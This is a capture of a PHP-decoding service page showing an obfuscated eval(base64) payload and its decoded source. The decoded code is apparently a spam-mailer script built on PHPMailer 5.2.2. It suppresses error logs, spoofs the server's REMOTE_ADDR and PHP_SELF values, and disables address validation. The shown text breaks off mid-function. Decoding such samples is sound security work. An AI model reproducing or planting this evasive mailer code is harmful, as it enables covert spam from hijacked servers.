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Submission Tags: falconsandbox
Submission: On July 23 via api from US — Scanned from NL
Submission Tags: falconsandbox
Submission: On July 23 via api from US — Scanned from NL
Form analysis
1 forms found in the DOM<form class="form-inline" role="form" id="mailchimp-form">
<div class="form-group col-md-4">
<label class="sr-only" for="email_address">Email Address</label>
<input type="email" name="email" class="form-control" id="email_address" placeholder="Email Address" style="width: 100%">
<button type="submit" class="btn btn-success">Subscribe</button>
Text Content
UnPHP * Decode * Recent * API * Services * Contact FIND THIS USEFUL? ENTER YOUR EMAIL TO RECEIVE OCCASIONAL UPDATES FOR SECURING PHP CODE. Email Address Subscribe Signing you up... Thank you for signing up! PHP DECODE <?php eval(gzuncompress(base64_decode('eNrtfQt32zjO6F/RaN3KmtqxnfQ1dpU2k7rTnE2aTOLOzm6S9af.. DECODED OUTPUT DOWNLOAD <?php @ini_set('error_log', NULL); @ini_set('log_errors', 0); @ini_set('mail.add_x_header', 0); @ini_set('expose_php', 0); @ini_set('mail.add_x_header', 'off'); @ini_set('expose_php', 'off'); @ini_set('error_reporting', 0); @ini_set('display_errors', 0); $oldphpself = $_SERVER['PHP_SELF']; $oldremoteaddr = $_SERVER['REMOTE_ADDR']; $_SERVER['PHP_SELF'] = "/"; $_SERVER['REMOTE_ADDR'] = $_SERVER['SERVER_ADDR']; class SMTP { public $SMTP_PORT = 25; public $CRLF = " "; public $do_debug; public $Debugoutput = "echo"; public $do_verp = false; public $Timeout = 15; public $Timelimit = 30; public $Version = '5.2.2'; private $smtp_conn; private $error; private $helo_rply; private function edebug($str) { if ($this->Debugoutput == "error_log") { error_log($str); } else { echo $str; } } public function __construct() { $this->smtp_conn = 0; $this->error = null; $this->helo_rply = null; $this->do_debug = 0; } public function Connect($host, $port = 0, $tval = 30) { $this->error = null; if ($this->connected()) { $this->error = array("error" => "Already connected to a server"); return false; } if (empty($port)) { $port = $this->SMTP_PORT; } echo "$host "; $this->smtp_conn = @fsockopen($host, $port, $errno, $errstr, $tval); if (empty($this->smtp_conn)) { $this->error = array("error" => "Failed to connect to server", "errno" => $errno, "errstr" => $errstr); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": $errstr ($errno)" . $this->CRLF . '<br />'); } return false; } if (substr(PHP_OS, 0, 3) != "WIN") { $max = ini_get('max_execution_time'); if ($max != 0 && $tval > $max) { @set_time_limit($tval); } stream_set_timeout($this->smtp_conn, $tval, 0); } $announce = $this->get_lines(); if ($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $announce . $this->CRLF . '<br />'); } return true; } public function StartTLS() { $this->error = null; if (!$this->connected()) { $this->error = array("error" => "Called StartTLS() without being connected"); return false; } fputs($this->smtp_conn, "STARTTLS" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if ($code != 220) { $this->error = array("error" => "STARTTLS not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } if (!stream_socket_enable_crypto($this->smtp_conn, true, STREAM_CRYPTO_METHOD_TLS_CLIENT)) { return false; } return true; } public function Authenticate($username, $password, $authtype = 'LOGIN', $realm = '', $workstation = '') { if (empty($authtype)) { $authtype = 'LOGIN'; } switch ($authtype) { case 'PLAIN': fputs($this->smtp_conn, "AUTH PLAIN" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($code != 334) { $this->error = array("error" => "AUTH not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } fputs($this->smtp_conn, base64_encode("" . $username . "" . $password) . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($code != 235) { $this->error = array("error" => "Authentication not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } break; case 'LOGIN': fputs($this->smtp_conn, "AUTH LOGIN" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($code != 334) { $this->error = array("error" => "AUTH not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } fputs($this->smtp_conn, base64_encode($username) . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($code != 334) { $this->error = array("error" => "Username not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } fputs($this->smtp_conn, base64_encode($password) . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($code != 235) { $this->error = array("error" => "Password not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } break; case 'NTLM': require_once ('ntlm_sasl_client.php'); $temp = new stdClass(); $ntlm_client = new ntlm_sasl_client_class; if (!$ntlm_client->Initialize($temp)) { $this->error = array("error" => $temp->error); if ($this->do_debug >= 1) { $this->edebug("You need to enable some modules in your php.ini file: " . $this->error["error"] . $this->CRLF); } return false; } $msg1 = $ntlm_client->TypeMsg1($realm, $workstation); fputs($this->smtp_conn, "AUTH NTLM " . base64_encode($msg1) . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($code != 334) { $this->error = array("error" => "AUTH not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF); } return false; } $challange = substr($rply, 3); $challange = base64_decode($challange); $ntlm_res = $ntlm_client->NTLMResponse(substr($challange, 24, 8), $password); $msg3 = $ntlm_client->TypeMsg3($ntlm_res, $username, $realm, $workstation); fputs($this->smtp_conn, base64_encode($msg3) . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($code != 235) { $this->error = array("error" => "Could not authenticate", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF); } return false; } break; } return true; } public function Connected() { if (!empty($this->smtp_conn)) { $sock_status = socket_get_status($this->smtp_conn); if ($sock_status["eof"]) { if ($this->do_debug >= 1) { $this->edebug("SMTP -> NOTICE:" . $this->CRLF . "EOF caught while checking if connected"); } $this->Close(); return false; } return true; } return false; } public function Close() { $this->error = null; $this->helo_rply = null; if (!empty($this->smtp_conn)) { fclose($this->smtp_conn); $this->smtp_conn = 0; } } public function Data($msg_data) { $this->error = null; if (!$this->connected()) { $this->error = array("error" => "Called Data() without being connected"); return false; } fputs($this->smtp_conn, "DATA" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if ($code != 354) { $this->error = array("error" => "DATA command not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } $msg_data = str_replace(" ", " ", $msg_data); $msg_data = str_replace(" ", " ", $msg_data); $lines = explode(" ", $msg_data); $field = substr($lines[0], 0, strpos($lines[0], ":")); $in_headers = false; if (!empty($field) && !strstr($field, " ")) { $in_headers = true; } $max_line_length = 998; while (list(, $line) = @each($lines)) { $lines_out = null; if ($line == "" && $in_headers) { $in_headers = false; } while (strlen($line) > $max_line_length) { $pos = strrpos(substr($line, 0, $max_line_length), " "); if (!$pos) { $pos = $max_line_length - 1; $lines_out[] = substr($line, 0, $pos); $line = substr($line, $pos); } else { $lines_out[] = substr($line, 0, $pos); $line = substr($line, $pos + 1); } if ($in_headers) { $line = " " . $line; } } $lines_out[] = $line; while (list(, $line_out) = @each($lines_out)) { if (strlen($line_out) > 0) { if (substr($line_out, 0, 1) == ".") { $line_out = "." . $line_out; } } fputs($this->smtp_conn, $line_out . $this->CRLF); } } fputs($this->smtp_conn, $this->CRLF . "." . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if ($code != 250) { $this->error = array("error" => "DATA not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } return true; } public function Hello($host = '') { $this->error = null; if (!$this->connected()) { $this->error = array("error" => "Called Hello() without being connected"); return false; } if (empty($host)) { $host = "localhost"; } if (!$this->SendHello("EHLO", $host)) { if (!$this->SendHello("HELO", $host)) { return false; } } return true; } private function SendHello($hello, $host) { fputs($this->smtp_conn, $hello . " " . $host . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER: " . $rply . $this->CRLF . '<br />'); } if ($code != 250) { $this->error = array("error" => $hello . " not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } $this->helo_rply = $rply; return true; } public function Mail($from) { $this->error = null; if (!$this->connected()) { $this->error = array("error" => "Called Mail() without being connected"); return false; } $useVerp = ($this->do_verp ? " XVERP" : ""); fputs($this->smtp_conn, "MAIL FROM:<" . $from . ">" . $useVerp . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if ($code != 250) { $this->error = array("error" => "MAIL not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } return true; } public function Quit($close_on_error = true) { $this->error = null; if (!$this->connected()) { $this->error = array("error" => "Called Quit() without being connected"); return false; } fputs($this->smtp_conn, "quit" . $this->CRLF); $byemsg = $this->get_lines(); if ($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $byemsg . $this->CRLF . '<br />'); } $rval = true; $e = null; $code = substr($byemsg, 0, 3); if ($code != 221) { $e = array("error" => "SMTP server rejected quit command", "smtp_code" => $code, "smtp_rply" => substr($byemsg, 4)); $rval = false; if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $e["error"] . ": " . $byemsg . $this->CRLF . '<br />'); } } if (empty($e) || $close_on_error) { $this->Close(); } return $rval; } public function Recipient($to) { $this->error = null; if (!$this->connected()) { $this->error = array("error" => "Called Recipient() without being connected"); return false; } fputs($this->smtp_conn, "RCPT TO:<" . $to . ">" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if ($code != 250 && $code != 251) { $this->error = array("error" => "RCPT not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } return true; } public function Reset() { $this->error = null; if (!$this->connected()) { $this->error = array("error" => "Called Reset() without being connected"); return false; } fputs($this->smtp_conn, "RSET" . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if ($code != 250) { $this->error = array("error" => "RSET failed", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } return true; } public function SendAndMail($from) { $this->error = null; if (!$this->connected()) { $this->error = array("error" => "Called SendAndMail() without being connected"); return false; } fputs($this->smtp_conn, "SAML FROM:" . $from . $this->CRLF); $rply = $this->get_lines(); $code = substr($rply, 0, 3); if ($this->do_debug >= 2) { $this->edebug("SMTP -> FROM SERVER:" . $rply . $this->CRLF . '<br />'); } if ($code != 250) { $this->error = array("error" => "SAML not accepted from server", "smtp_code" => $code, "smtp_msg" => substr($rply, 4)); if ($this->do_debug >= 1) { $this->edebug("SMTP -> ERROR: " . $this->error["error"] . ": " . $rply . $this->CRLF . '<br />'); } return false; } return true; } public function Turn() { $this->error = array("error" => "This method, TURN, of the SMTP " . "is not implemented"); if ($this->do_debug >= 1) { $this->edebug("SMTP -> NOTICE: " . $this->error["error"] . $this->CRLF . '<br />'); } return false; } public function getError() { return $this->error; } private function get_lines() { $data = ""; $endtime = 0; if (!is_resource($this->smtp_conn)) { return $data; } stream_set_timeout($this->smtp_conn, $this->Timeout); if ($this->Timelimit > 0) { $endtime = time() + $this->Timelimit; } while (is_resource($this->smtp_conn) && !feof($this->smtp_conn)) { $str = @fgets($this->smtp_conn, 515); if ($this->do_debug >= 4) { $this->edebug("SMTP -> get_lines(): \$data was \"$data\"" . $this->CRLF . '<br />'); $this->edebug("SMTP -> get_lines(): \$str is \"$str\"" . $this->CRLF . '<br />'); } $data.= $str; if ($this->do_debug >= 4) { $this->edebug("SMTP -> get_lines(): \$data is \"$data\"" . $this->CRLF . '<br />'); } if (substr($str, 3, 1) == " ") { break; } $info = stream_get_meta_data($this->smtp_conn); if ($info['timed_out']) { if ($this->do_debug >= 4) { $this->edebug("SMTP -> get_lines(): timed-out (" . $this->Timeout . " seconds) <br />"); } break; } if ($endtime) { if (time() > $endtime) { if ($this->do_debug >= 4) { $this->edebug("SMTP -> get_lines(): timelimit reached (" . $this->Timelimit . " seconds) <br />"); } break; } } } return $data; } } class PHPMailer { public $CharSet = 'iso-8859-1'; public $ContentType = 'text/plain'; public $Encoding = '8bit'; public $ErrorInfo = ''; public $From = 'root@localhost'; public $FromName = 'Root User'; public $Sender = ''; public $ReturnPath = ''; public $Subject = ''; public $Body = ''; public $AltBody = ''; protected $MIMEBody = ''; protected $MIMEHeader = ''; protected $mailHeader = ''; public $WordWrap = 0; public $Mailer = 'mail'; public $Sendmail = '/usr/sbin/sendmail'; public $UseSendmailOptions = true; public $PluginDir = ''; public $ConfirmReadingTo = ''; public $Hostname = ''; public $MessageID = ''; public $MessageDate = ''; public $Host = 'localhost'; public $Port = 25; public $Helo = ''; public $SMTPSecure = ''; public $SMTPAuth = false; public $Username = ''; public $Password = ''; public $AuthType = ''; public $Realm = ''; public $Workstation = ''; public $Timeout = 15; public $SMTPDebug = false; public $Debugoutput = "echo"; public $SMTPKeepAlive = false; public $SingleTo = false; public $SingleToArray = array(); public $LE = " "; public $DKIM_selector = ''; public $DKIM_identity = ''; public $DKIM_passphrase = ''; public $DKIM_domain = ''; public $DKIM_private = ''; public $action_function = ''; public $Version = '5.2.2'; public $XMailer = ''; protected $smtp = null; protected $to = array(); protected $cc = array(); protected $bcc = array(); protected $ReplyTo = array(); protected $all_recipients = array(); protected $attachment = array(); protected $CustomHeader = array(); protected $message_type = ''; protected $boundary = array(); protected $language = array(); protected $error_count = 0; protected $sign_cert_file = ''; protected $sign_key_file = ''; protected $sign_key_pass = ''; protected $exceptions = false; const STOP_MESSAGE = 0; const STOP_CONTINUE = 1; const STOP_CRITICAL = 2; const CRLF = " "; private function mail_passthru($to, $subject, $body, $header, $params) { if (ini_get('safe_mode') || !($this->UseSendmailOptions)) { $rt = @mail($to, $this->EncodeHeader($this->SecureHeader($subject)), $body, $header); } else { $rt = @mail($to, $this->EncodeHeader($this->SecureHeader($subject)), $body, $header, $params); } return $rt; } private function edebug($str) { if ($this->Debugoutput == "error_log") { error_log($str); } else { echo $str; } } public function __construct($exceptions = false) { $this->exceptions = ($exceptions == true); } public function IsHTML($ishtml = true) { if ($ishtml) { $this->ContentType = 'text/html'; } else { $this->ContentType = 'text/plain'; } } public function IsSMTP() { $this->Mailer = 'smtp'; } public function IsMail() { $this->Mailer = 'mail'; } public function IsSendmail() { if (!stristr(ini_get('sendmail_path'), 'sendmail')) { $this->Sendmail = '/var/qmail/bin/sendmail'; } $this->Mailer = 'sendmail'; } public function IsQmail() { if (stristr(ini_get('sendmail_path'), 'qmail')) { $this->Sendmail = '/var/qmail/bin/sendmail'; } $this->Mailer = 'sendmail'; } public function AddAddress($address, $name = '') { return $this->AddAnAddress('to', $address, $name); } public function AddCC($address, $name = '') { return $this->AddAnAddress('cc', $address, $name); } public function AddBCC($address, $name = '') { return $this->AddAnAddress('bcc', $address, $name); } public function AddReplyTo($address, $name = '') { return $this->AddAnAddress('Reply-To', $address, $name); } protected function AddAnAddress($kind, $address, $name = '') { if (!preg_match('/^(to|cc|bcc|Reply-To)$/', $kind)) { $this->SetError($this->Lang('Invalid recipient array') . ': ' . $kind); if ($this->exceptions) { throw new phpmailerException('Invalid recipient array: ' . $kind); } if ($this->SMTPDebug) { $this->edebug($this->Lang('Invalid recipient array') . ': ' . $kind); } return false; } $address = trim($address); $name = trim(preg_replace('/[ ]+/', '', $name)); if (!$this->ValidateAddress($address)) { $this->SetError($this->Lang('invalid_address') . ': ' . $address); if ($this->exceptions) { throw new phpmailerException($this->Lang('invalid_address') . ': ' . $address); } if ($this->SMTPDebug) { $this->edebug($this->Lang('invalid_address') . ': ' . $address); } return false; } if ($kind != 'Reply-To') { if (!isset($this->all_recipients[strtolower($address) ])) { array_push($this->$kind, array($address, $name)); $this->all_recipients[strtolower($address) ] = true; return true; } } else { if (!array_key_exists(strtolower($address), $this->ReplyTo)) { $this->ReplyTo[strtolower($address) ] = array($address, $name); return true; } } return false; } public function SetFrom($address, $name = '', $auto = 1) { $address = trim($address); $name = trim(preg_replace('/[ ]+/', '', $name)); if (!$this->ValidateAddress($address)) { $this->SetError($this->Lang('invalid_address') . ': ' . $address); if ($this->exceptions) { throw new phpmailerException($this->Lang('invalid_address') . ': ' . $address); } if ($this->SMTPDebug) { $this->edebug($this->Lang('invalid_address') . ': ' . $address); } return false; } $this->From = $address; $this->FromName = $name; if ($auto) { if (empty($this->ReplyTo)) { $this->AddAnAddress('Reply-To', $address, $name); } if (empty($this->Sender)) { $this->Sender = $address; } } return true; } public static function ValidateAddress($address) { return true; } public function Send() { try { if (!$this->PreSend()) return false; return $this->PostSend(); } catch(phpmailerException $e) { $this->mailHeader = ''; $this->SetError($e->getMessage()); if ($this->exceptions) { throw $e; } return false; } } public function PreSend() { try { $this->mailHeader = ""; if ((count($this->to) + count($this->cc) + count($this->bcc)) < 1) { throw new phpmailerException($this->Lang('provide_address'), self::STOP_CRITICAL); } if (!empty($this->AltBody)) { $this->ContentType = 'multipart/alternative'; } $this->error_count = 0; $this->SetMessageType(); if (empty($this->Body)) { throw new phpmailerException($this->Lang('empty_message'), self::STOP_CRITICAL); } $this->MIMEHeader = $this->CreateHeader(); $this->MIMEBody = $this->CreateBody(); if ($this->Mailer == 'mail') { if (count($this->to) > 0) { $this->mailHeader.= $this->AddrAppend("To", $this->to); } else { $this->mailHeader.= $this->HeaderLine("To", "undisclosed-recipients:;"); } $this->mailHeader.= $this->HeaderLine('Subject', $this->EncodeHeader($this->SecureHeader(trim($this->Subject)))); } if (!empty($this->DKIM_domain) && !empty($this->DKIM_private) && !empty($this->DKIM_selector) && !empty($this->DKIM_domain) && file_exists($this->DKIM_private)) { $header_dkim = $this->DKIM_Add($this->MIMEHeader, $this->EncodeHeader($this->SecureHeader($this->Subject)), $this->MIMEBody); $this->MIMEHeader = str_replace(" ", " ", $header_dkim) . $this->MIMEHeader; } return true; } catch(phpmailerException $e) { $this->SetError($e->getMessage()); if ($this->exceptions) { throw $e; } return false; } } public function PostSend() { try { switch ($this->Mailer) { case 'sendmail': return $this->SendmailSend($this->MIMEHeader, $this->MIMEBody); case 'smtp': return $this->SmtpSend($this->MIMEHeader, $this->MIMEBody); case 'mail': return $this->MailSend($this->MIMEHeader, $this->MIMEBody); default: return $this->MailSend($this->MIMEHeader, $this->MIMEBody); } } catch(phpmailerException $e) { $this->SetError($e->getMessage()); if ($this->exceptions) { throw $e; } if ($this->SMTPDebug) { $this->edebug($e->getMessage() . " "); } } return false; } protected function SendmailSend($header, $body) { if ($this->Sender != '') { $sendmail = sprintf("%s -oi -f%s -t", escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender)); } else { $sendmail = sprintf("%s -oi -t", escapeshellcmd($this->Sendmail)); } if ($this->SingleTo === true) { foreach ($this->SingleToArray as $val) { if (!@$mail = popen($sendmail, 'w')) { throw new phpmailerException($this->Lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } fputs($mail, "To: " . $val . " "); fputs($mail, $header); fputs($mail, $body); $result = pclose($mail); $isSent = ($result == 0) ? 1 : 0; $this->doCallback($isSent, $val, $this->cc, $this->bcc, $this->Subject, $body); if ($result != 0) { throw new phpmailerException($this->Lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } } } else { if (!@$mail = popen($sendmail, 'w')) { throw new phpmailerException($this->Lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } fputs($mail, $header); fputs($mail, $body); $result = pclose($mail); $isSent = ($result == 0) ? 1 : 0; $this->doCallback($isSent, $this->to, $this->cc, $this->bcc, $this->Subject, $body); if ($result != 0) { throw new phpmailerException($this->Lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } } return true; } protected function MailSend($header, $body) { $toArr = array(); foreach ($this->to as $t) { $toArr[] = $this->AddrFormat($t); } $to = implode(', ', $toArr); if (empty($this->Sender)) { $params = "-oi "; } else { $params = sprintf("-oi -f%s", $this->Sender); } if ($this->Sender != '' and !ini_get('safe_mode')) { $old_from = ini_get('sendmail_from'); @ini_set('sendmail_from', $this->Sender); } $rt = false; if ($this->SingleTo === true && count($toArr) > 1) { foreach ($toArr as $val) { $rt = $this->mail_passthru($val, $this->Subject, $body, $header, $params); $isSent = ($rt == 1) ? 1 : 0; $this->doCallback($isSent, $val, $this->cc, $this->bcc, $this->Subject, $body); } } else { $rt = $this->mail_passthru($to, $this->Subject, $body, $header, $params); $isSent = ($rt == 1) ? 1 : 0; $this->doCallback($isSent, $to, $this->cc, $this->bcc, $this->Subject, $body); } if (isset($old_from)) { @ini_set('sendmail_from', $old_from); } if (!$rt) { throw new phpmailerException($this->Lang('instantiate'), self::STOP_CRITICAL); } return true; } protected function SmtpSend($header, $body) { $bad_rcpt = array(); if (!$this->SmtpConnect()) { throw new phpmailerException($this->Lang('smtp_connect_failed'), self::STOP_CRITICAL); } $smtp_from = ($this->Sender == '') ? $this->From : $this->Sender; if (!$this->smtp->Mail($smtp_from)) { throw new phpmailerException($this->Lang('from_failed') . $smtp_from, self::STOP_CRITICAL); } foreach ($this->to as $to) { if (!$this->smtp->Recipient($to[0])) { $bad_rcpt[] = $to[0]; $isSent = 0; $this->doCallback($isSent, $to[0], '', '', $this->Subject, $body); } else { $isSent = 1; $this->doCallback($isSent, $to[0], '', '', $this->Subject, $body); } } foreach ($this->cc as $cc) { if (!$this->smtp->Recipient($cc[0])) { $bad_rcpt[] = $cc[0]; $isSent = 0; $this->doCallback($isSent, '', $cc[0], '', $this->Subject, $body); } else { $isSent = 1; $this->doCallback($isSent, '', $cc[0], '', $this->Subject, $body); } } foreach ($this->bcc as $bcc) { if (!$this->smtp->Recipient($bcc[0])) { $bad_rcpt[] = $bcc[0]; $isSent = 0; $this->doCallback($isSent, '', '', $bcc[0], $this->Subject, $body); } else { $isSent = 1; $this->doCallback($isSent, '', '', $bcc[0], $this->Subject, $body); } } if (count($bad_rcpt) > 0) { $badaddresses = implode(', ', $bad_rcpt); throw new phpmailerException($this->Lang('recipients_failed') . $badaddresses); } if (!$this->smtp->Data($header . $body)) { throw new phpmailerException($this->Lang('data_not_accepted'), self::STOP_CRITICAL); } if ($this->SMTPKeepAlive == true) { $this->smtp->Reset(); } else { $this->smtp->Quit(); $this->smtp->Close(); } return true; } public function SmtpConnect() { if (is_null($this->smtp)) { $this->smtp = new SMTP; } $this->smtp->Timeout = $this->Timeout; $this->smtp->do_debug = $this->SMTPDebug; $hosts = explode(';', $this->Host); $index = 0; $connection = $this->smtp->Connected(); try { while ($index < count($hosts) && !$connection) { $hostinfo = array(); if (preg_match('/^(.+):([0-9]+)$/', $hosts[$index], $hostinfo)) { $host = $hostinfo[1]; $port = $hostinfo[2]; } else { $host = $hosts[$index]; $port = $this->Port; } $tls = ($this->SMTPSecure == 'tls'); $ssl = ($this->SMTPSecure == 'ssl'); if ($this->smtp->Connect(($ssl ? 'ssl://' : '') . $host, $port, $this->Timeout)) { $hello = ($this->Helo != '' ? $this->Helo : $this->ServerHostname()); $this->smtp->Hello($hello); if ($tls) { if (!$this->smtp->StartTLS()) { throw new phpmailerException($this->Lang('tls')); } $this->smtp->Hello($hello); } $connection = true; if ($this->SMTPAuth) { if (!$this->smtp->Authenticate($this->Username, $this->Password, $this->AuthType, $this->Realm, $this->Workstation)) { throw new phpmailerException($this->Lang('authenticate')); } } } $index++; if (!$connection) { throw new phpmailerException($this->Lang('connect_host')); } } } catch(phpmailerException $e) { $this->smtp->Reset(); if ($this->exceptions) { throw $e; } } return true; } public function SmtpClose() { if ($this->smtp !== null) { if ($this->smtp->Connected()) { $this->smtp->Quit(); $this->smtp->Close(); } } } function SetLanguage($langcode = 'en', $lang_path = 'language/') { $PHPMAILER_LANG = array('authenticate' => 'SMTP Error: Could not authenticate.', 'connect_host' => 'SMTP Error: Could not connect to SMTP host.', 'data_not_accepted' => 'SMTP Error: Data not accepted.', 'empty_message' => 'Message body empty', 'encoding' => 'Unknown encoding: ', 'execute' => 'Could not execute: ', 'file_access' => 'Could not access file: ', 'file_open' => 'File Error: Could not open file: ', 'from_failed' => 'The following From address failed: ', 'instantiate' => 'Could not instantiate mail function.', 'invalid_address' => 'Invalid address', 'mailer_not_supported' => ' mailer is not supported.', 'provide_address' => 'You must provide at least one recipient email address.', 'recipients_failed' => 'SMTP Error: The following recipients failed: ', 'signing' => 'Signing Error: ', 'smtp_connect_failed' => 'SMTP Connect() failed.', 'smtp_error' => 'SMTP server error: ', 'variable_set' => 'Cannot set or reset variable: '); $l = true; if ($langcode != 'en') { $l = @include $lang_path . 'phpmailer.lang-' . $langcode . '.php'; } $this->language = $PHPMAILER_LANG; return ($l == true); } public function GetTranslations() { return $this->language; } public function AddrAppend($type, $addr) { $addr_str = $type . ': '; $addresses = array(); foreach ($addr as $a) { $addresses[] = $this->AddrFormat($a); } $addr_str.= implode(', ', $addresses); $addr_str.= $this->LE; return $addr_str; } public function AddrFormat($addr) { if (empty($addr[1])) { return $this->SecureHeader($addr[0]); } else { return $this->EncodeHeader($this->SecureHeader($addr[1]), 'phrase') . " <" . $this->SecureHeader($addr[0]) . ">"; } } public function WrapText($message, $length, $qp_mode = false) { $soft_break = ($qp_mode) ? sprintf(" =%s", $this->LE) : $this->LE; $is_utf8 = (strtolower($this->CharSet) == "utf-8"); $lelen = strlen($this->LE); $crlflen = strlen(self::CRLF); $message = $this->FixEOL($message); if (substr($message, -$lelen) == $this->LE) { $message = substr($message, 0, -$lelen); } $line = explode($this->LE, $message); $message = ''; for ($i = 0;$i < count($line);$i++) { $line_part = explode(' ', $line[$i]); $buf = ''; for ($e = 0;$e < count($line_part);$e++) { $word = $line_part[$e]; if ($qp_mode and (strlen($word) > $length)) { $space_left = $length - strlen($buf) - $crlflen; if ($e != 0) { if ($space_left > 20) { $len = $space_left; if ($is_utf8) { $len = $this->UTF8CharBoundary($word, $len); } elseif (substr($word, $len - 1, 1) == "=") { $len--; } elseif (substr($word, $len - 2, 1) == "=") { $len-= 2; } $part = substr($word, 0, $len); $word = substr($word, $len); $buf.= ' ' . $part; $message.= $buf . sprintf("=%s", self::CRLF); } else { $message.= $buf . $soft_break; } $buf = ''; } while (strlen($word) > 0) { $len = $length; if ($is_utf8) { $len = $this->UTF8CharBoundary($word, $len); } elseif (substr($word, $len - 1, 1) == "=") { $len--; } elseif (substr($word, $len - 2, 1) == "=") { $len-= 2; } $part = substr($word, 0, $len); $word = substr($word, $len); if (strlen($word) > 0) { $message.= $part . sprintf("=%s", self::CRLF); } else { $buf = $part; } } } else { $buf_o = $buf; $buf.= ($e == 0) ? $word : (' ' . $word); if (strlen($buf) > $length and $buf_o != '') { $message.= $buf_o . $soft_break; $buf = $word; } } } $message.= $buf . self::CRLF; } return $message; } public function UTF8CharBoundary($encodedText, $maxLength) { $foundSplitPos = false; $lookBack = 3; while (!$foundSplitPos) { $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack); $encodedCharPos = strpos($lastChunk, "="); if ($encodedCharPos !== false) { $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2); $dec = hexdec($hex); if ($dec < 128) { $maxLength = ($encodedCharPos == 0) ? $maxLength : $maxLength - ($lookBack - $encodedCharPos); $foundSplitPos = true; } elseif ($dec >= 192) { $maxLength = $maxLength - ($lookBack - $encodedCharPos); $foundSplitPos = true; } elseif ($dec < 192) { 